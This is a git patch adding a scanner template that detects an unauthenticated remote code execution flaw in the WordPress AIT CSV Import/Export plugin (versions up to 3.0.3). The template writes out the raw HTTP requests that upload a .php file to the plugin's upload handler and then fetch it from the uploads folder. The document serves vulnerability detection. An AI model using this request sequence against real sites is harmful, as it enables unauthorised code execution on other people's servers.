From aacb8f738f60e81b5e844b2f94ee66846562e41a Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 22 May 2022 10:12:09 +0900 Subject: [PATCH] Create ait-csv-import-export-rce.yaml The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload-handler does not require authentication, nor validates the uploaded content. Signed-off-by: GwanYeong Kim --- .../wordpress/ait-csv-import-export-rce.yaml | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 vulnerabilities/wordpress/ait-csv-import-export-rce.yaml diff --git a/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml b/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml new file mode 100644 index 0000000000..9e34438888 --- /dev/null +++ b/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml @@ -0,0 +1,47 @@ +id: ait-csv-import-export-rce + +info: + name: WordPress AIT CSV Import Export - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload-handler does not require authentication, nor validates the uploaded content. + reference: + - https://wpscan.com/vulnerability/10471 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 9.8 + cwe-id: CWE-434 + tags: wordpress,wp-plugin,rce,upload,unauth,ait-csv + +requests: + - raw: + - | + POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=------------------------ab360007dbae2de8 + + --------------------------ab360007dbae2de8 + Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" + Content-Type: application/octet-stream + + + + --------------------------ab360007dbae2de8-- + + - | + GET /wp-content/uploads/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "fe394b60dc324c3bac3060d600ad4349" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/22